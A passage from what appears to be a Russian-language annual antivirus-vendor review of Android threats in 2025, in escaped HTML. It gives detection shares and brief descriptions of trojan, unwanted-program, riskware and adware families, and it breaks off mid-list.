&lt;p&gt;Самым активным представителем семейства оказался &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt; — на него пришлось более трети детектирований. Троян попал в поле зрения наших вирусных аналитиков еще в 2024 году и за это время выбился в лидеры. Он является одним из множества вариантов &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1994&lt;/b&gt; — вредоносной программы, известной с 2021 года. Распространение получили и несколько ее новых версий — например, &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.666.origin&lt;/b&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.673.origin&lt;/b&gt;. Нельзя исключать, что со временем они также могут подняться на верхние строчки, как это ранее случалось с другими модификациями &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1994&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;В течение года пользователи вновь сталкивались с подсемейством &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, Aegis, однако доля таких вредоносных программ от общего числа детектирований семейства заметно сократилась — с 17,37% до 3,11%. Эти трояны отличаются, в том числе, способностью запускаться автоматически после установки. Среди них самыми активными стали варианты &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds.Aegis&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds.Aegis&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.8.origin&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Вторым по распространенности вредоносным ПО оказались рекламные трояны &lt;a href="https://vms.drweb.ru/search/?q=Android.MobiDash&amp;lng=ru"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;, доля которых по сравнению с 2024 годом увеличилась с 5,38% до 15,64%. Среди них лидировал &lt;a href="https://vms.drweb.ru/search/?q=Android.MobiDash&amp;lng=ru"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;. За ними расположились программы-подделки &lt;a href="https://vms.drweb.ru/search/?q=Android.FakeApp&amp;lng=ru"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, которые используются в мошеннических целях и вместо обещанной функциональности загружают различные сайты. На них пришлось 10,94% детектирований. Это ниже показателя 2024 года, когда их доля составляла 18,28%. Такое снижение произошло, в том числе, за счет меньшей активности трояна &lt;a href="https://vms.drweb.ru/search/?q=Android.FakeApp&amp;lng=ru"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;, однако он все еще остается самым распространенным представителем семейства. Его главной задачей является загрузка сайтов онлайн-казино.&lt;/p&gt;

&lt;p&gt;Доля троянских программ семейства &lt;a href="https://vms.drweb.ru/search/?q=Android.Spy&amp;lng=ru"&gt;&lt;b&gt;Android.Spy&lt;/b&gt;&lt;/a&gt;, реализующих различную шпионскую функциональность, сократилась с 11,52% до 3,09%. В то же время повысилась активность банковских троянов. Их доля от общего числа детектирований вредоносных приложений составила 6,94% против показателя 6,29% годом ранее.&lt;/p&gt;

&lt;p&gt;В 2025 году с 5,49% до 6,01% увеличилось число детектирований программных упаковщиков, которые могут использовать, в том числе, и злоумышленники с целью защиты ВПО от обнаружения и анализа. Чаще всего на защищаемых устройствах выявлялись вредоносные программы с упаковщиком &lt;a href="https://vms.drweb.ru/search/?q=Android.Packed&amp;lng=ru"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57146&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Распространение получили различные вредоносные моды мессенджера WhatsApp. Среди них были модификации (Dr.Web детектирует их как &lt;a href="https://vms.drweb.ru/search/?q=Android.Click&amp;lng=ru"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;), загружающие веб-сайты незаметно для жертв. Также наблюдалась возросшая активность многофункциональных троянов семейства &lt;a href="https://vms.drweb.ru/search/?q=Android.Triada&amp;lng=ru"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;, которые злоумышленники могут внедрять в прошивку Android-устройств. Их доля возросла с 2,74% до 7,48%.&lt;/p&gt;

&lt;p&gt;Десять наиболее часто детектируемых вредоносных Android-приложений в 2025 году:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/08_2025_malware_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/08_2025_malware_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4214&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4213&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.HiddenAds&amp;lng=ru"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.666.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троянские программы для показа навязчивой рекламы. Представители этого семейства часто распространяются под видом безобидных приложений и в некоторых случаях устанавливаются в системный каталог другим вредоносным ПО. Попадая на Android-устройства, такие рекламные трояны обычно скрывают от пользователя свое присутствие в системе — например, «прячут» значок приложения из меню главного экрана.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.MobiDash&amp;lng=ru"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троянская программа, показывающая надоедливую рекламу. Она представляет собой программный модуль, который разработчики ПО встраивают в приложения.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.FakeApp&amp;lng=ru"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троянская программа, которая загружает указанный в ее настройках веб-сайт. Известные модификации этого вредоносного приложения загружают сайт онлайн-казино.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.Click&amp;lng=ru"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование вредоносных модов мессенджера WhatsApp, которые незаметно для пользователя могут загружать различные сайты в фоновом режиме.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.Packed&amp;lng=ru"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57146&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование вредоносных приложений, которые упакованы с помощью популярного коммерческого обфускатора кода.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Android.Triada&amp;lng=ru"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5847&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование упаковщика для троянов семейства &lt;a href="https://vms.drweb.ru/search/?q=Android.Triada&amp;lng=ru"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;, предназначенного для их защиты от анализа и обнаружения. Чаще всего злоумышленники используют его совместно с вредоносными модами мессенджера Telegram, в которые непосредственно встроены эти трояны.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;Нежелательное ПО&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;Наиболее распространенным нежелательным ПО в 2025 году вновь стали приложения &lt;a href="https://vms.drweb.ru/search/?q=Program.FakeMoney&amp;lng=ru"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;, на которые пришлось 51,96% детектирований. Они предлагают пользователям за вознаграждение выполнять те или иные задания и якобы в дальнейшем позволяют конвертировать награду в настоящие деньги. На самом деле никаких выплат в итоге не происходит. Вместе с &lt;a href="https://vms.drweb.ru/search/?q=Program.FakeMoney&amp;lng=ru"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; распространение получили и другие аналогичные программы, например — &lt;a href="https://vms.drweb.ru/search/?q=Program.FakeMoney&amp;lng=ru"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt; и &lt;a href="https://vms.drweb.ru/search/?q=Program.FakeMoney&amp;lng=ru"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt;, однако с ними пользователи сталкивались значительно реже.&lt;/p&gt;

&lt;p&gt;На втором месте с показателем 10,37% расположились программы &lt;a href="https://vms.drweb.ru/search/?q=Program.FakeAntiVirus&amp;lng=ru"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;, которые имитируют работу антивирусов и обнаруживают несуществующие угрозы. Для «лечения» заражения они предлагают приобрести полную версию ПО.&lt;/p&gt;

&lt;p&gt;Приложения &lt;a href="https://vms.drweb.ru/search/?q=Program.CloudInject&amp;lng=ru"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;, которые модифицируются в облачном сервисе CloudInject, с долей 6,41% стали третьими по распространенности. Их варианты, детектируемые как &lt;a href="https://vms.drweb.ru/search/?q=Program.CloudInject&amp;lng=ru"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;, с показателем 5,08% оказались рядом с ними на четвертой позиции. Изменения в такие программы вносятся непосредственно на удаленном сервере, а доступ к сервису предоставляет утилита &lt;a href="https://vms.drweb.ru/search/?q=Tool.CloudInject&amp;lng=ru"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;, которая является лишь оболочкой для работы с ним. При модификации к программам добавляются опасные системные разрешения и обфусцированный код. Кроме того, через сервис CloudInject моддеры способны дистанционно управлять модифицированными приложениями, например, заблокировать их и потребовать ввести код для дальнейшего использования.&lt;/p&gt;

&lt;p&gt;В 2025 году наблюдался незначительный рост числа детектирований ряда программ, которые могут применяться для наблюдения за пользователями и контроля их активности. В руках злоумышленников такие инструменты превращаются в шпионское ПО. Так, доля приложения &lt;a href="https://vms.drweb.ru/search/?q=Program.TrackView&amp;lng=ru"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; и его варианта &lt;a href="https://vms.drweb.ru/search/?q=Program.TrackView&amp;lng=ru"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt; увеличилась с 2,40% до 2,91% и с 0,21% до 0,97% соответственно. Доля &lt;a href="https://vms.drweb.ru/search/?q=Program.SecretVideoRecorder&amp;lng=ru"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; возросла c 2,03% до 2,56%, а его модификации &lt;a href="https://vms.drweb.ru/search/?q=Program.SecretVideoRecorder&amp;lng=ru"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt; — с 0,90% до 1,02%. Показатель программы &lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt; увеличился с 0,31% до 1,01%.&lt;/p&gt;

&lt;p&gt;Десять наиболее часто детектируемых нежелательных приложений в 2025 году:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/09_2025_unwanted_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/09_2025_unwanted_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.FakeMoney&amp;lng=ru"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.FakeMoney&amp;lng=ru"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование приложений, якобы позволяющих зарабатывать на выполнении тех или иных действий или заданий. Эти программы имитируют начисление вознаграждений, причем для вывода «заработанных» денег требуется накопить определенную сумму. Обычно в них имеется список популярных платежных систем и банков, через которые якобы возможно перевести награды. Но даже когда пользователям удается накопить достаточную для вывода сумму, обещанные выплаты им не поступают. Этой записью также детектируется другое нежелательное ПО, основанное на коде таких программ.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.FakeAntiVirus&amp;lng=ru"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование рекламных программ, которые имитируют работу антивирусного ПО. Такие программы могут сообщать о несуществующих угрозах и вводить пользователей в заблуждение, требуя оплатить покупку полной версии.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.CloudInject&amp;lng=ru"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.CloudInject&amp;lng=ru"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование Android-приложений, модифицированных при помощи облачного сервиса CloudInject и одноименной Android-утилиты (добавлена в вирусную базу Dr.Web как &lt;a href="https://vms.drweb.ru/search/?q=Tool.CloudInject&amp;lng=ru"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Такие программы модифицируются на удаленном сервере, при этом заинтересованный в их изменении пользователь (моддер) не контролирует, что именно будет в них встроено. Кроме того, приложения получают набор опасных разрешений. После модификации программ у моддера появляется возможность дистанционно управлять ими — блокировать, показывать настраиваемые диалоги, отслеживать факт установки и удаления другого ПО и т. д.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.TrackView&amp;lng=ru"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.TrackView&amp;lng=ru"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование приложения, позволяющего вести наблюдение за пользователями через Android-устройства. С помощью этой программы злоумышленники могут определять местоположение целевых устройств, использовать камеру для записи видео и создания фотографий, выполнять прослушивание через микрофон, создавать аудиозаписи и т. д.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.SecretVideoRecorder&amp;lng=ru"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Program.SecretVideoRecorder&amp;lng=ru"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование различных версий приложения для фоновой фото- и видеосъемки через встроенные камеры Android-устройств. Эта программа может работать незаметно, позволяя отключить уведомления о записи, а также изменять значок и описание приложения на фальшивые. Такая функциональность делает ее потенциально опасной.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Программа для наблюдения за владельцами Android-устройств. Она позволяет читать СМС, получать информацию о телефонных вызовах, отслеживать местоположение и выполнять аудиозапись окружения.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;Потенциально опасные программы&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;В 2025 году самым распространенным потенциально опасным ПО стали программы, модифицированные при помощи инструмента NP Manager. Это утилита для модификации приложений, которая содержит различные модули для обфускации и защиты кода программ, а также обхода проверки их цифровой подписи после модификации. Злоумышленники часто применяют ее для защиты вредоносных приложений, чтобы затруднить их детектирование антивирусами. Доля таких программ по сравнению с 2024 годом возросла с 24,52% до 53,59%, и на них пришлось уже более половины детектирований потенциально опасного ПО. Чаще всего на защищаемых устройствах встречались варианты &lt;b&gt;Tool.NPMod.3&lt;/b&gt; (32,85%), &lt;b&gt;Tool.NPMod.1&lt;/b&gt; (12,61%), &lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt; (3,02%) и &lt;b&gt;Tool.NPMod.4&lt;/b&gt; (2,31%).&lt;/p&gt;

&lt;p&gt;С 3,93% до 8,11% возросло количество детектирований &lt;a href="https://vms.drweb.ru/search/?q=Tool.Androlua&amp;lng=ru"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt; — ряда фреймворков, созданных для разработки Android-приложений на языке программирования Lua. Они требуют множество системных разрешений, включая использование службы специальных возможностей Android. Созданные с их помощью программы построены на Lua-скриптах, которые зашифрованы и расшифровываются только непосредственно перед исполнением. Такие скрипты потенциально могут быть вредоносными. С 8,16% до 10,06% увеличилась доля приложений, модифицированных при помощи утилиты &lt;a href="https://vms.drweb.ru/search/?q=Tool.LuckyPatcher&amp;lng=ru"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;. Этот инструмент модифицирует установленные программы, загружая из интернета специально подготовленные скрипты.&lt;/p&gt;

&lt;p&gt;В то же время доля утилит &lt;a href="https://vms.drweb.ru/search/?q=Tool.SilentInstaller&amp;lng=ru"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;, которые позволяют запускать Android-приложения без их установки, снизилась с 33,10% до 10,55%. Самыми распространенными вариантами семейства в 2025 году стали &lt;a href="https://vms.drweb.ru/search/?q=Tool.SilentInstaller&amp;lng=ru"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt; (4,66%), &lt;a href="https://vms.drweb.ru/search/?q=Tool.SilentInstaller&amp;lng=ru"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.6.origin&lt;/b&gt; (2,07%) и &lt;a href="https://vms.drweb.ru/search/?q=Tool.SilentInstaller&amp;lng=ru"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt; (1,88%). Кроме того, с 13,17% до 2,58% уменьшилась доля программ, защищенных упаковщиком &lt;a href="https://vms.drweb.ru/search/?q=Tool.Packer&amp;lng=ru"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Десять наиболее распространенных потенциально опасных приложений, обнаруженных на Android-устройствах в 2025 году:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/10_2025_riskware_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/10_2025_riskware_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование Android-приложений, модифицированных при помощи утилиты NP Manager. Эта утилита содержит модули для обфускации и защиты кода программ, а также обхода проверки их цифровой подписи после модификации. Добавляемая ей обфускация часто используется во вредоносном ПО для затруднения его детектирования и анализа.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Tool.Androlua&amp;lng=ru"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование ряда потенциально опасных версий специализированного фреймворка для разработки Android-программ на скриптовом языке программирования Lua. Основная логика Lua-приложений расположена в соответствующих скриптах, которые зашифрованы и расшифровываются интерпретатором перед выполнением. Часто данный фреймворк по умолчанию запрашивает доступ ко множеству системных разрешений для работы, в том числе для использования сервиса специальных возможностей ОС Android. В результате исполняемые через него Lua-скрипты способны выполнять различные вредоносные действия в соответствии с полученными разрешениями.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Tool.LuckyPatcher&amp;lng=ru"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Tool.LuckyPatcher&amp;lng=ru"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Утилита, позволяющая модифицировать установленные Android-приложения (создавать для них патчи) с целью изменения логики их работы или обхода тех или иных ограничений. Например, с ее помощью пользователи могут попытаться отключить проверку root-доступа в банковских программах или получить неограниченные ресурсы в играх. Для создания патчей утилита загружает из интернета специально подготовленные скрипты, которые могут создавать и добавлять в общую базу все желающие. Функциональность таких скриптов может оказаться в том числе и вредоносной, поэтому создаваемые патчи могут представлять потенциальную опасность.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Tool.SilentInstaller&amp;lng=ru"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Потенциально опасная программная платформа, которая позволяет приложениям запускать APK-файлы без их установки. Она создает виртуальную среду исполнения, которая не затрагивает основную операционную систему.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Tool.Packer&amp;lng=ru"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Специализированная утилита-упаковщик для защиты Android-приложений от модификации и обратного инжиниринга. Она не является вредоносной, но может использоваться для защиты как безобидных, так и троянских программ.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;Рекламные приложения&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;Среди рекламного ПО наибольшее распространение в 2025 году получили сторонние модификации приложения WhatsApp, детектируемые как &lt;a href="https://vms.drweb.ru/search/?q=Adware.ModAd&amp;lng=ru"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;. В такие модификации внедрена функциональность по открытию ссылок при работе с мессенджером. С этих ссылок выполняется перенаправление на рекламируемые сайты. По сравнению с 2024 годом доля &lt;a href="https://vms.drweb.ru/search/?q=Adware.ModAd&amp;lng=ru"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; от общего числа рекламных приложений, обнаруженных на защищаемых устройствах, снизилась с 47,45% до 26,90%.&lt;/p&gt;

&lt;p&gt;Встраиваемые в Android-программы модули &lt;a href="https://vms.drweb.ru/search/?q=Adware.Adpush&amp;lng=ru"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;, которые демонстрируют рекламные уведомления, расположились на втором месте, за год увеличив активность с 14,76% до 26,19%. Третье место с показателем 8,88% заняли представители семейства &lt;b&gt;Adware.Basement&lt;/b&gt;, доля которых по сравнению с годом ранее осталась практически неизменной. Такие программы могут показывать рекламу, которая ведет на вредоносные сайты.&lt;/p&gt;

&lt;p&gt;Распространение также получили семейства рекламных приложений &lt;a href="https://vms.drweb.ru/search/?q=Adware.Airpush&amp;lng=ru"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt; (число детектирований возросло с 4,35% до 5,14%), &lt;a href="https://vms.drweb.ru/search/?q=Adware.Fictus&amp;lng=ru"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt; (рост с 3,29% до 6,21%), &lt;b&gt;Adware.Youmi&lt;/b&gt; (рост с 1,62% до 2,91%) а также &lt;a href="https://vms.drweb.ru/search/?q=Adware.Leadbolt&amp;lng=ru"&gt;&lt;b&gt;Adware.Leadbolt&lt;/b&gt;&lt;/a&gt; (рост с 2,26% до 2,41%) и &lt;b&gt;Adware.Jiubang&lt;/b&gt; (рост с 1,70% до 2,38%).&lt;/p&gt;

&lt;p&gt;Десять наиболее распространенных рекламных приложений, обнаруженных на Android-устройствах в 2025 году:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/11_2025_adware_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/11_2025_adware_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Adware.ModAd&amp;lng=ru"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование некоторых модифицированных версий (модов) мессенджера WhatsApp, в функции которых внедрен код для загрузки заданных ссылок через веб-отображение во время работы с мессенджером. С этих интернет-адресов выполняется перенаправление на рекламируемые сайты — например, онлайн-казино и букмекеров, сайты для взрослых.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Adware.AdPush&amp;lng=ru"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Adware.Adpush&amp;lng=ru"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.21846&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.ru/search/?q=Adware.AdPush&amp;lng=ru"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.39.origin&lt;/b&gt;&lt;/dt&gt;
